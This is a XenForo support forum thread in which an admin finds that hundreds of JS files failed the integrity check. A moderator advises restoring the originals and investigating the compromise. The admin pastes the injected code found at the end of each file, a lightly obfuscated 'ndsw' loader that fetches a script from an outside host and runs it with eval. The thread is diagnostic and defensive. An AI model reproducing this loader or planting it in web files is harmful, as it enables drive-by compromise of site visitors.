XF 2.1 File health check problem, all JS files showing Unexpected contents

Mian Shahid

Well-known member
Hi, my ACP showing File health Check warning having Unexpected contents in almost all JS files, including XF core files and all addons JS files.

I am using XF 2.1.1, is this due to any major change in XF core or it belongs to my own?

2021-05-11_215417.jpg

Previous 8 are the updates XF released after 2.1.1, but on May 5, 2021 the number of files increased from 8 to 327 and all on them are JS files for example:

2021-05-11_220330.jpg

Any Idea other then Re-installing XF, because we have few template modification which will wipe off if we re install the script.
 
Solution
Extract the files which have failed the check from the upgrade archive, and upload them again.

You will want to investigate how they came to be changed on the server.

Brogan

XenForo moderator
Staff member
Extract the files which have failed the check from the upgrade archive, and upload them again.

You will want to investigate how they came to be changed on the server.
 
Solution

webbouk

Well-known member
Ditto, the same or similar issue....


XF2.2.5 & XF2.2.4
 

Mian Shahid

Well-known member
I have tested few different JS files some from XF and few from addons, and found the following code inserted at end of each JS file

Code:
;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//itdarasgah.com/ITDQuiz/admin/images/combine/combine.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};

This meant, the problem is from server side, so I am going to change my all JS with original from XF, and will contact with server provider, it might be some sort of attack which may be not only effected my board but few other on same server too.

any further expert opinion? what to do, and what not? beside of changing all JS file, Thanks for all who commented to detect/solve my issue.
 

Taminoful

Member
Since you have the same problem as @webbouk I'll link my reply to his thread here too for visibility

 
Top